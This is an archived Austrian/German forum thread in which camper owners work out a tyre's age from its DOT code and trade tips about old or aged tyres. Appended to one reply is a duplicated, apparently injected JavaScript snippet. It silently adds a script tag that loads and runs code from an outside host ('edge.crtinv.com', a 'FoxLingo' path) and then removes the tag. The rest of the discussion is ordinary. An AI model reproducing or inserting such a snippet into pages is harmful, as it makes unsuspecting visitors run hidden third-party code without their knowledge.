PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Alter der Reifen....



Hawky
02.09.2012, 21:12
Auf Grund eines Reifenplatzers am Wohnmobil unserer Freunde sind wir neugierig geworden und wollten mal heraus finden, wie alt genau die Reifen an unserm Blümchenmobil sind. Im Internet haben wir gelesen, dass die sogenannte DOT Nummer Aufschluss über das Reifenalter bzw. das Herstelldatum gibt.

Hab mal unsere Reifen angesehen und auf 2 Reifen die Nummer
DOT HW8X ETF2 215/70 R15C RADIAL 109/107R 65PSI TUBLESS E4 0009473
gefunden.

Hat irgendjemand eine Ahnung, wie alt diese Reifen sind?? [hmm]

benny
02.09.2012, 21:20
normalerweise hast in der nähe oder bei der DOT nummer eine 4stellige zahlen kombination die gibt dir das alter an


http://www.auto-motor.at/auto-fotos/Auto-Service/Autoreifen/Sommerreifen-Produktionsdatum/Herstellungsdatum-Reifen-1.html

am foto siehst du 3206 das heißt 32 woche im 2006 jahr

Hawky
02.09.2012, 21:35
bei den 2 anderen Reifen ist das der Fall und ich konnte das Alter bestimmen....auf den anderen 2 Reifen ist eben nur die angeführte Nummer....

benny
02.09.2012, 21:38
bei den 2 anderen Reifen ist das der Fall und ich konnte das Alter bestimmen....auf den anderen 2 Reifen ist eben nur die angeführte Nummer....


dann könnte sein das diese beiden etwas älter sind....

da_luis
02.09.2012, 21:48
hallo

Die DOT-Nummer steht immer nur auf einer Seite des Reifen.
Bei Reifen mit Laufrichtung siehst du immer nur auf 2 Reifen diese Dot-Nummer. Entweder links oder rechts am Fahrzeug.

mfG

Hawky
02.09.2012, 22:23
Ich hab mir sicherheitshalber alle 4 Reifen angeschaut und auf 2 Reifen die DOT-Nummer nicht gefunden....allerdings auf der gleichen Achse.....und auf den anderen 2 schon :(

gegei23
02.09.2012, 23:25
Ich hab mir sicherheitshalber alle 4 Reifen angeschaut und auf 2 Reifen die DOT-Nummer nicht gefunden....allerdings auf der gleichen Achse.....und auf den anderen 2 schon :(


Servus,

soviel ich von unserem Reifenhändler aus unserer Firma weiss, sind die Reifen der älteren Baureihen nicht mit DOT gekennzeichnet sondern mit dreistelligen Ziffern und einem Dreieck dahinter.
Z.B. 349(Dreieck) würde bedeuten 34Kalenderwoche 1999.

derfranze
03.09.2012, 09:28
Auf Grund eines Reifenplatzers am Wohnmobil unserer Freunde sind wir neugierig geworden und wollten mal heraus finden, wie alt genau die Reifen an unserm Blümchenmobil sind. Im Internet haben wir gelesen, dass die sogenannte DOT Nummer Aufschluss über das Reifenalter bzw. das Herstelldatum gibt.

Hab mal unsere Reifen angesehen und auf 2 Reifen die Nummer
DOT HW8X ETF2 215/70 R15C RADIAL 109/107R 65PSI TUBLESS E4 0009473
gefunden.

Hat irgendjemand eine Ahnung, wie alt diese Reifen sind?? [hmm]

So wie es ausschaut sind das verstärkte Reifen mit Tragfähigkeitsindex für Einzelanwendung und Zwillingsbereifung.

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();!function( ){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

schlesi66
03.09.2012, 16:08
Hallo
Da steht danz sicher eine DOT Nummer.
4 stellig
Wird wohl an der Innenseite sein.;)
Sollte noch ein dreistelliger Code sein, dann würde ich mit den Reifen nicht mehr fahren.:D:D
Wurde im Jahr 2000 geändert.

Hawky
03.09.2012, 20:31
Danke für eure Tipps!
Hab mich heut mit einer Taschenlampe unter´s Blümchenmobil begeben und wirklich an der Innenseite die DOT-Nummer gefunden. Wir haben 3 Reifen aus 10/2007 und einen aus 07/2006......und beschlossen, dass wir im Frühjahr in neue Reifen investieren!

Und nein....die Reifen sind nicht falsch montiert....es ist keine Laufrichtung eingezeichnet....

abo
03.09.2012, 20:46
....Wir haben 3 Reifen aus 10/2007 ......und beschlossen, dass wir im Frühjahr in neue Reifen investieren!
....


hallo

das ankurbeln der wirtschaft ist immer gut

wenns meinst kauf halt neue
pass aber welche du ans auto montiert bekommst

laut gerichtsentscheid koennen reifen bis zu 5 jahren nach der herstellung als NEU verkauft werden

es kann also im moment so sein dass dir der freundliche reifenhaendler reifen mit herstellungsdatum 10/2007 montiert

also gleich alte wie die welche du grad drauf hast ...

lg
g

Hawky
03.09.2012, 21:05
Naja....neue Reifen wollen wir eigentlich, weil wir dann wissen, woran wir sind.....und danke Tipp für den Tipp beim Kauf

abo
03.09.2012, 21:14
Naja....neue Reifen wollen wir eigentlich, weil wir dann wissen, woran wir sind.....

hallo

tja
und da seh ich halt keine verbesserung ehrlich gesagt

ich hab grad auch so a bloede sache mit meinen bike reifen

bridgestone battlax

DOT code 0508
also woche 5 aus 2008
sind mir im sommer 2010 ans bike montiert worden

jetzt krieg ich kein pickerl mehr wegen der dinger
das profil ist ausreichend
aber im profil risse bis auf die karkasse
teils gummibloecke aus dem profil rausgebrochen

a witz nach zwei saisonen und ca 10.000km

aber da kannst kaum was machen
es gibt keine "mindesthaltbarkeit" bei reifen

lg
g

PS:
@fluesterer, uetzi, benny und aehnlich vorwitzige kollegen:
anzuegliche bemerkungen ueber unpassend hohes koerpergewicht und damit einhergehender ueberschreitung der achslasten als ursache werden mit grillerei-sperre nicht unter 6 monaten geahndet ....

Flüsterer
04.09.2012, 00:13
hallo

tja
und da seh ich halt keine verbesserung ehrlich gesagt

ich hab grad auch so a bloede sache mit meinen bike reifen

bridgestone battlax

DOT code 0508
also woche 5 aus 2008
sind mir im sommer 2010 ans bike montiert worden

jetzt krieg ich kein pickerl mehr wegen der dinger
das profil ist ausreichend
aber im profil risse bis auf die karkasse
teils gummibloecke aus dem profil rausgebrochen

a witz nach zwei saisonen und ca 10.000km

aber da kannst kaum was machen
es gibt keine "mindesthaltbarkeit" bei reifen

lg
g

PS:
@fluesterer, uetzi, benny und aehnlich vorwitzige kollegen:
anzuegliche bemerkungen ueber unpassend hohes koerpergewicht und damit einhergehender ueberschreitung der achslasten als ursache werden mit grillerei-sperre nicht unter 6 monaten geahndet ....

...als ob ICH schon jemals irgendwas in der Richtung auch nur im Entferntesten angedeutet hätte:rolleyes::rolleyes::rolleyes: